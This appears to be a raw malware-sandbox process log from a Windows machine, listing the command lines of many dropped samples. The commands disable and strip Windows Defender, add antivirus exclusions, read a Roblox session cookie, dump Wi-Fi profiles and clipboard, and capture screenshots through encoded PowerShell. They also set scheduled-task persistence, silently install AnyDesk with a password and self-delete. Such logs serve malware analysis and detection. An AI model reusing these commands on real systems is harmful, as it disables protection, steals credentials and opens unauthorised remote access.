"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1920 -ip 1920
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 1220
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4016 -s 384
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp" /SL5="$D0230,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 4548 -ip 4548
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4548 -s 492
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4388 -s 2248
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6052 -s 700
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 5516 -ip 5516
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 4016 -ip 4016
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4016 -s 668
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2976 -ip 2976
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 1272
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6D572EB81CD218E5FBCEEECAD339B1B7
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantApp.exe" --commit fullExeInstall
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantClient.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantUser.exe"
C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe
"C:\Users\Admin\AppData\Roaming\Signiant\SigniantWatchdog.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6848 -ip 6848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 76
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4i790k.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5604 -ip 5604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 1160
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F0.tmp\1F1.tmp\1F2.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3DF0.tmp\3DF1.tmp\3DF2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6004 -ip 6004
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 992
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3352 -ip 3352
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\WerFault.exe
